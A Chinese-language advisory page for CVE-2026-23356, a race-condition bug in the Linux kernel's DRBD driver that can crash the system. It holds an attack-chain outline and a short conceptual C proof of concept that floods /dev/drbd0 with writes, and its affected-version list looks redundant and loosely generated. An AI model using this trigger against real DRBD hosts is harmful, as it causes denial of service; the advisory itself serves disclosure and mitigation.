CVE-2026-23356 CVSS 5.5 中危

CVE-2026-23356 Linux内核DRBD逻辑错误漏洞

披露日期: 2026-03-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23356

漏洞类型

逻辑错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核DRBD模块存在逻辑漏洞，在`drbd_al_begin_io_nonblock()`函数中未正确处理`lc_get_cumulative()`失败的情况。这导致引用计数管理错误，可能触发内核崩溃及拒绝服务。

技术细节

该漏洞发生在Linux内核的DRBD驱动中。当调用`drbd_al_begin_io_nonblock()`时，代码假设在持有`device->al_lock`自旋锁下，`lc_get_cumulative()`定会成功。然而，竞态条件允许其他代码路径（如`lc_try_lock()`）导致该调用失败。原代码仅记录日志却未返回错误，致使后续流程误认为请求已持有活动日志引用。请求结束时，代码尝试释放不存在的引用，触发`lc_put()`中的`BUG_ON(refcnt == 0)`断言，导致系统崩溃。

攻击链分析

STEP 1

本地访问

攻击者需要获取本地系统的低权限用户访问权限。

STEP 2

触发IO请求

攻击者针对配置了DRBD的设备执行大量的IO操作，特别是跨越活动日志边界的请求。

STEP 3

竞态条件触发

在高并发下，`lc_get_cumulative()`失败但未被正确处理，导致引用计数不一致。

STEP 4

系统崩溃

当IO请求处理结束，尝试释放无效引用时触发内核断言，导致系统崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC Concept: Triggering DRBD IO race condition
// This is a conceptual example. Local access is required.
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
    // Open the DRBD device (requires access permissions)
    int fd = open("/dev/drbd0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    char buffer[4096];
    // Perform write operations to potentially trigger the nonblock IO path
    // In a real scenario, specific timing and load are needed to hit the race.
    for (int i = 0; i < 10000; i++) {
        pwrite(fd, buffer, sizeof(buffer), 4096 * i);
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel < 6.13

Linux Kernel < 6.12

Linux Kernel < 6.11

Linux Kernel < 6.6

防御指南

临时缓解措施

限制非特权用户对DRBD块设备的访问权限，降低本地攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表